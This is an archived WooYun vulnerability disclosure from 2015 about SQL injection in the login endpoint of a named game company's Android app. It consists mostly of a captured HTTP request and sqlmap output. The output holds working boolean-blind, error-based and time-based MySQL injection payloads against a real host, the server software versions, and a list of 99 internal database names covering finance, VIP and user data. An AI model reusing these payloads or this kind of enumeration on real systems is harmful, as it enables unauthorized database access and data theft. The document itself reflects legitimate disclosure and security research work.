乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-12: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开
RT
漏洞app安卓版:
http://mobile.ztgame.com/mobile/index.php
安装安卓app后,启动登陆处存在sql注入
POST /mobileapp/index.php HTTP/1.1Host: mobile.ztgame.comConnection: keep-aliveContent-Length: 52Accept: application/json, text/javascript, */*; q=0.01Origin: https://mobile.ztgame.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://mobile.ztgame.com/mobileapp/index.phpAccept-Encoding: gzip,deflateAccept-Language: zh-CN,en-US;q=0.8Cookie: PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3act=setsubmit&username=admin&password=123456&openId=
各种注入:
---Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=setsubmit&username=admin' RLIKE (SELECT (CASE WHEN (1364=1364)THEN 0x61646d696e ELSE 0x28 END)) AND 'zBPi'='zBPi&password=123456&openId= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=setsubmit&username=admin' AND (SELECT 3506 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(3506=3506,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CTYM'='CTYM&password=123456&openId= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=setsubmit&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))umgI) AND 'IDKo'='IDKo&password=123456&openId=---[05:25:33] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.11, PHP 5.4.4back-end DBMS: MySQL 5.0
涉及99个库,数据重不重要你们比我更清楚:
available databases [99]:[*] a_consume_day[*] a_ly360_consume_day[*] a_ptaidata_web[*] a_zoneinfo_hour[*] action_rpt_god[*] action_rpt_hs[*] action_rpt_pla[*] action_rpt_xxsj[*] action_rpt_ztgame[*] action_rpt_ztnew[*] all_zoneInfo[*] all_zoneInfo_hour[*] anti_fraud_cheat_account[*] anti_fraud_stat[*] area_stat_rpt[*] buy_silver[*] caiwu_check[*] caiwu_data_report[*] cb_rpt[*] check_ordervsobj[*] check_up[*] classify_user_rpt[*] consume_vip[*] cs_order[*] csjz_cb_tmp[*] csjz_hour_stat[*] data_node_course_detail[*] data_node_name_day[*] db_union_sortlist[*] dim_tpart_config[*] dim_zoneinfo_for_xinjian[*] easy_consume_rpt[*] finance_dw[*] finance_lost_reg[*] GAQ[*] GAQ1_download[*] GAQ4_download[*] GAQ5_download[*] GAQ6_download[*] GAQ8_download[*] GAQ9_download[*] hbs[*] hour_computer[*] hour_computer_back[*] hour_computer_bak11111[*] information_schema[*] jh_sortlist[*] loading_lost[*] mail_quick[*] media_stat[*] money_monitor[*] mysql[*] new_user_rpt[*] newzone_15index[*] objkeywords_stat[*] peng[*] ptai_stat_219[*] ptai_stat_report[*] ptai_stat_report_del[*] ptai_stat_rpt[*] realtime_rpt[*] realtime_rpt_test[*] realtime_rpt_tmp[*] remain_rpt[*] report[*] resource_manage_system[*] rpt_client_adcost[*] rpt_client_ptai_stat[*] rpt_mobile_conf[*] rpt_mobile_consume_stat[*] rpt_mobile_ptai_stat[*] rpt_mobile_realtime_stat[*] rpt_mobile_realtime_stat_test[*] rpt_mobile_user_trace[*] rpt_mobile_user_trace_test[*] rpt_must_ptai_stat[*] rpt_must_user_trace[*] scb_ws[*] scb_xxsj[*] select_db_detail[*] sobj_stat[*] sortlist_collect_rpt[*] stat[*] stat_analyze[*] stat_consume[*] test[*] transform_rpt[*] user_analyze[*] user_analyze_xt[*] user_analyze_zt2[*] user_analyze_ztgame[*] user_center_rpt[*] user_segmentation_report[*] vip[*] vip_xt_obj[*] vip_zt2_obj[*] vip_ztgame_obj[*] xxxx[*] zoneinfo
直觉告诉我数据信息量很大很重要,作为一个有节操的白帽子,未脱库,可查日志,点到为止。危害这么大,可否来个20rank?
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-25 06:24
漏洞Rank:15 (WooYun评价)
暂无